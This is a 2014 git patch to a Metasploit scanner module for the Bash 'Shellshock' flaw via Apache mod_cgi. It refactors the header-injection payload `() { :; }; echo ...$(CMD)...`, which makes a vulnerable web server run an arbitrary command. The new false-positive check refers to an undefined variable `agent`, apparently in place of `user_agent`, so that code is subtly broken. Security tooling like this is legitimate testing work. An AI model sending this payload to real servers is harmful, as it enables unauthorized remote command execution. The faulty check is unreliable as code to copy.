From b1e9b3664e064628eb5998b6e6710a411101bef0 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 25 Sep 2014 01:01:11 -0500
Subject: [PATCH] Improve false positive check

---
 modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
index 45fa5ae6e0..62fded16d8 100644
--- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
+++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -42,13 +42,16 @@ class Metasploit4 < Msf::Auxiliary
 
   def run_host(ip)
     marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+    user_agent = %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
 
     res = send_request_raw(
       'method' => datastore['METHOD'],
       'uri' => normalize_uri(target_uri.path),
-      'agent' => %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
+      'agent' => user_agent
     )
 
+    return if (res && res.body.include?(agent))
+
     if res && res.body =~ /#{marker}(.+)#{marker}/m
       print_good("#{peer} - #{$1}")
       report_vuln(